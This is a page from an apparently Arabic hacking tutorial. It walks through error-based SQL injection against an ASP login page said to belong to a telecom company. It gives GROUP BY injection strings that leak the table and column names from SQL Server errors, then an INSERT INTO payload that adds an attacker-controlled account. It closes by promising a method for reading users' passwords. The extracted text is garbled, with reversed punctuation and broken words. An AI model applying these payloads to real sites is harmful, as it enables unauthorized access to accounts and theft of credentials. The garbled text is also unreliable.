Page 236 - بسم الله الرحمن الرحيم

P. 236

‫‪Microsoft OLE DB Provider for ODBC Drivers error‬‬
‫‪''80040e14‬‬

‫]‪Microsoft][ODBC SQL Server Driver][SQL Server]Column‬‬
‫‪'cs_isp_user.passwd' is invalid in the select list because it‬‬

‫‪is not contained in either an aggregate function or the‬‬
‫‪.GROUP BY clause‬‬

‫‪arabic/Scripts/ar_csd_reply.asp, line 33/‬‬

‫هنا حصلنا على معلومتين وهي أسم الجدول وهو ‪cs_isp_user‬‬
‫وأيضا أسم أحد العمده وهو ‪passwd‬‬

‫نقو‪.‬م الن بتكرار العمل السابق ولكن بإستخدا‪.‬م اسم العمود الجديد‬
‫فنقو‪.‬م بإدختال أسم المستخد‪.‬م التالي ‪--(blah' group by (passwd :‬‬

‫فنحصل على الخطأ التالي ‪:‬‬

‫اقتباس‪:‬‬

‫‪Microsoft OLE DB Provider for ODBC Drivers error‬‬
‫‪''80040e14‬‬

‫]‪Microsoft][ODBC SQL Server Driver][SQL Server]Column‬‬
‫‪'cs_isp_user.UserID' is invalid in the select list because it is‬‬
‫‪not contained in either an aggregate function or the GROUP‬‬

‫‪.BY clause‬‬
‫‪arabic/Scripts/ar_csd_reply.asp, line 33/‬‬

‫حصلنا على أسم عمود وهو ‪ UserID‬وهو نفسه ما قمنا بتخمينه وهو ‪userid‬‬
‫تصجدر الشاره إلى أن ‪ MS SQL Server‬ليس حساس لحالة الحرف ‪(:‬‬

‫نلحظ أننا سنكون في حلقه غير منتهيه ول نحصل إل على أسماء الجداول ‪ UserID‬و ‪passwd‬‬
‫إذن الجدول ل يحوي إل على عمودين وهي التي حصلنا عليها‬

‫إذن في الحاله هذه نقو‪.‬م بأدختال مستخد‪.‬م جهديد للجدول وبعدها نقو‪.‬م بالدختول بشكل طبيعي من الصفحه‬
‫الخاصه بتسجيل الدختول ‪(:‬‬

‫سنقو‪.‬م بكتابة التالي في ختانة أسم المستخد‪.‬م ‪blah' INSERT INTO :‬‬
‫‪cs_isp_user(UserID,passwd‬‬
‫( ‪--('VALUES('M_3','hi‬‬

‫حيث سيتم إضافة مستخد‪.‬م جهديد له أسم مستخد‪.‬م ‪ M_3‬وكلمة مرور ‪hi‬‬
‫وبعدها تصستطيع الدختول للصفحة المحميه بهذه البيانات على أنك مخول له بالدختول‬

‫في مثالنا )شركة التصصالت( أنتهينا من استغلل أمكانية عمل ‪ inject‬لها ولكننا سنكمل الحديث عن طريقه‬
‫ممتعه لكي نستطبع قرائة اسماء المستخدمين وكلمات مرورهم وبعدها تصستطيع الدختول بأي منها دون إضافة‬

‫‪236‬‬

231 232 233 234 235 236 237 238 239 240 241